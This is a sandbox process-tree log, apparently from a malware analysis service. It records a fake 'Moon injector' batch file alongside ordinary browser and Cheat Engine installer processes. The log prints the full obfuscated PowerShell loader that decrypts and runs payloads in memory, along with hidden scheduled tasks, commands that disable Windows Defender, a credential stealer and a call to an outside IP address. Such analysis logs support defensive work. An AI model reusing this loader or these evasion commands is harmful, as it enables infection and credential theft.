C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4220,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=4216 /prefetch:86⤵PID:9200
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4628,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=4640 /prefetch:86⤵PID:9660
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4224,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:86⤵PID:4552
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4836,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=4632 /prefetch:86⤵PID:5844
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5148,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=5164 /prefetch:86⤵PID:11980
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=5320 /prefetch:86⤵PID:12124
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5464,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=5300 /prefetch:86⤵PID:9172
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5308,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=5304 /prefetch:86⤵PID:6448
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5160,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=5752 /prefetch:86⤵PID:9772
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5904,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=5896 /prefetch:86⤵PID:9976
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6056,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=5620 /prefetch:86⤵PID:6416
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5908,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:86⤵PID:12420
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6088,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=6376 /prefetch:86⤵PID:12432
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5472,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=6500 /prefetch:86⤵PID:12656
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5748,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:86⤵PID:4300
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5476,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=6816 /prefetch:86⤵PID:10824
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6968,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:86⤵PID:2116
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7108,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=7120 /prefetch:86⤵PID:2436
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6080,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=7128 /prefetch:86⤵PID:11624
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6724,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=6804 /prefetch:86⤵PID:12596
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7100,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=7552 /prefetch:86⤵PID:13052
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6964,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=7696 /prefetch:86⤵PID:13168
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=shortcut-pin-helper /prefetch:8 has-startpin "C:\Users\Public\Desktop\AVG Secure Browser.lnk"6⤵PID:7396
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --disable-protect6⤵PID:12832
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\AVG\Browser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=124.0.25039.207 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff981b3dc40,0x7ff981b3dc4c,0x7ff981b3dc587⤵PID:12864
-
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7380,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=7632 /prefetch:86⤵PID:12872
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-AS3K2.tmp\CheatEngine75.exe"C:\Users\Admin\AppData\Local\Temp\is-AS3K2.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST4⤵PID:8020
-
C:\Users\Admin\AppData\Local\Temp\is-A5PI8.tmp\CheatEngine75.tmp"C:\Users\Admin\AppData\Local\Temp\is-A5PI8.tmp\CheatEngine75.tmp" /SL5="$B01FC,26511452,832512,C:\Users\Admin\AppData\Local\Temp\is-AS3K2.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST5⤵
- Drops file in Program Files directory
- Modifies registry class
PID:2720 -
C:\Windows\SYSTEM32\net.exe"net" stop BadlionAntic6⤵PID:5388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BadlionAntic7⤵PID:7864
-
-
-
C:\Windows\SYSTEM32\net.exe"net" stop BadlionAnticheat6⤵PID:4152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BadlionAnticheat7⤵PID:532
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc" delete BadlionAntic6⤵
- Launches sc.exe
PID:6700
-
-
C:\Windows\SYSTEM32\sc.exe"sc" delete BadlionAnticheat6⤵
- Launches sc.exe
PID:5856
-
-
C:\Users\Admin\AppData\Local\Temp\is-M8LTR.tmp\_isetup\_setup64.tmphelper 105 0x3AC6⤵PID:4140
-
-
C:\Windows\system32\icacls.exe"icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)6⤵
- Modifies file permissions
PID:6272
-
-
C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe"C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe" /SETUP6⤵PID:8088
-
-
C:\Program Files\Cheat Engine 7.5\windowsrepair.exe"C:\Program Files\Cheat Engine 7.5\windowsrepair.exe" /s6⤵PID:2328
-
-
C:\Windows\system32\icacls.exe"icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)6⤵
- Modifies file permissions
PID:7660
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 9044⤵
- Program crash
PID:5856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 17284⤵
- Program crash
PID:6288
-
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --edition=std-2 --host=https://autoupdate.geo.opera.com/ --installationdatadir="C:\Users\Admin\AppData\Local\Programs\Opera GX" --installdir="C:\Users\Admin\AppData\Local\Programs\Opera GX" --lang=en-US --pipeid --producttype --requesttype=shutdown --version=109.0.5097.98 --user-data-dir="C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable" --firstrunver=109.0.5097.98 --firstrunts=1716406989 --consent-info=eyJzdGF0aXN0aWNzX2NvbGxlY3Rpb25fZW5hYmxlZCI6dHJ1ZSwidXNlcl9leHBlcmllbmNlX21ldHJpY3NfcmVwb3J0aW5nX2VuYWJsZWQiOnRydWV92⤵PID:5608
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ff60529f8f4,0x7ff60529f900,0x7ff60529f9103⤵PID:804
-
-
-
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe"1⤵PID:3808
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\52e6a9c3b2d54975a8f081ffd57f718b /t 7612 /p 75721⤵PID:4228
-
C:\ProgramData\Dllhost\dllhost.exeC:\ProgramData\Dllhost\dllhost.exe1⤵PID:4496
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json2⤵PID:1832
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵PID:1252
-
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json3⤵PID:6628
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json2⤵PID:11476
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵PID:11848
-
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json3⤵PID:2236
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json2⤵PID:11668
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵PID:13136
-
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json3⤵PID:8244
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe"C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:7140
-
C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe"C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:6020
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Music\Moon injector\Moon injector.bat1⤵PID:748
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Music\Moon injector\Moon injector.bat" "1⤵PID:6876
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7YNWuWccFweVyeLXWBoLlbiIgwIIzlMQDgQUPu0BH+Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XOctXl3Au6ZqUvw4/+T5UQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $STnbK=New-Object System.IO.MemoryStream(,$param_var); $qoreo=New-Object System.IO.MemoryStream; $gcqez=New-Object System.IO.Compression.GZipStream($STnbK, [IO.Compression.CompressionMode]::Decompress); $gcqez.CopyTo($qoreo); $gcqez.Dispose(); $STnbK.Dispose(); $qoreo.Dispose(); $qoreo.ToArray();}function execute_function($param_var,$param2_var){ $ucwPd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ULbbs=$ucwPd.EntryPoint; $ULbbs.Invoke($null, $param2_var);}$YtpeL = 'C:\Users\Admin\Music\Moon injector\Moon injector.bat';$host.UI.RawUI.WindowTitle = $YtpeL;$bkDWL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YtpeL).Split([Environment]::NewLine);foreach ($enmav in $bkDWL) { if ($enmav.StartsWith('vIcBaaaAXYAacxmnREMn')) { $WNVfN=$enmav.Substring(20); break; }}$payloads_var=[string[]]$WNVfN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵PID:2172
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_499_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_499.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:4612
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_499.vbs"3⤵PID:3884
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_499.bat" "4⤵PID:4292
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7YNWuWccFweVyeLXWBoLlbiIgwIIzlMQDgQUPu0BH+Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XOctXl3Au6ZqUvw4/+T5UQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $STnbK=New-Object System.IO.MemoryStream(,$param_var); $qoreo=New-Object System.IO.MemoryStream; $gcqez=New-Object System.IO.Compression.GZipStream($STnbK, [IO.Compression.CompressionMode]::Decompress); $gcqez.CopyTo($qoreo); $gcqez.Dispose(); $STnbK.Dispose(); $qoreo.Dispose(); $qoreo.ToArray();}function execute_function($param_var,$param2_var){ $ucwPd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ULbbs=$ucwPd.EntryPoint; $ULbbs.Invoke($null, $param2_var);}$YtpeL = 'C:\Users\Admin\AppData\Roaming\Windows_Log_499.bat';$host.UI.RawUI.WindowTitle = $YtpeL;$bkDWL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YtpeL).Split([Environment]::NewLine);foreach ($enmav in $bkDWL) { if ($enmav.StartsWith('vIcBaaaAXYAacxmnREMn')) { $WNVfN=$enmav.Substring(20); break; }}$payloads_var=[string[]]$WNVfN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵PID:5456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"5⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5880 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google chrome" /tr "C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"6⤵
- Creates scheduled task(s)
PID:96
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose6⤵PID:12240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true6⤵PID:10772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true6⤵PID:9976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true6⤵PID:8576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true6⤵PID:5208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true6⤵PID:9892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force6⤵PID:3852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 66⤵PID:5344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 06⤵PID:8128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 66⤵PID:6440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 66⤵PID:876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true6⤵PID:7400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 26⤵PID:8900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Cd %temp% && All-In-One.exe OutPut.json6⤵PID:12448
-
C:\Users\Admin\AppData\Local\Temp\All-In-One.exeAll-In-One.exe OutPut.json7⤵
- Accesses Microsoft Outlook accounts
- Suspicious use of SetWindowsHookEx
PID:5160
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 83.143.112.35 7000 <123456789> F8F77C6B5996D49DBFEA6⤵PID:1388
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}7⤵PID:5340
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text8⤵PID:10676
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"1⤵
- Modifies system certificate store
PID:6268 -
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe"2⤵PID:4492
-
-
C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"1⤵PID:512
-
C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"1⤵PID:436
-
C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"1⤵PID:1036
-
C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"1⤵PID:2904
-
C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"1⤵PID:5276
-
C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"1⤵PID:3708
-
C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe"C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe" -pn:EPP -lpn:rav_antivirus -url:https://update.reasonsecurity.com/v2/live -bn:ReasonLabs -dt:101⤵
- Modifies data under HKEY_USERS
PID:3064
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /svc1⤵
- Writes to the Master Boot Record (MBR)
- Modifies data under HKEY_USERS
PID:5944 -
C:\Program Files (x86)\AVG\Browser\Update\Install\{409A7863-8F4B-4540-AFEE-BF6FC3C28354}\AVGBrowserInstaller.exe"C:\Program Files (x86)\AVG\Browser\Update\Install\{409A7863-8F4B-4540-AFEE-BF6FC3C28354}\AVGBrowserInstaller.exe" --chrome --do-not-launch-chrome --hide-browser-override --show-developer-mode --suppress-first-run-bubbles --default-search-id=3 --default-search=bing.com --adblock-mode-default=0 --no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data=chrome --import-cookies --auto-launch-chrome --system-level2⤵PID:5980
-
C:\Program Files (x86)\AVG\Browser\Update\Install\{409A7863-8F4B-4540-AFEE-BF6FC3C28354}\CR_E16C2.tmp\setup.exe"C:\Program Files (x86)\AVG\Browser\Update\Install\{409A7863-8F4B-4540-AFEE-BF6FC3C28354}\CR_E16C2.tmp\setup.exe" --install-archive="C:\Program Files (x86)\AVG\Browser\Update\Install\{409A7863-8F4B-4540-AFEE-BF6FC3C28354}\CR_E16C2.tmp\SECURE.PACKED.7Z" --chrome --do-not-launch-chrome --hide-browser-override --show-developer-mode --suppress-first-run-bubbles --default-search-id=3 --default-search=bing.com --adblock-mode-default=0 --no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data=chrome --import-cookies --auto-launch-chrome --system-level3⤵
- Modifies Installed Components in the registry
- Registers COM server for autorun
- Drops file in Program Files directory
- Modifies registry class
PID:3464 -
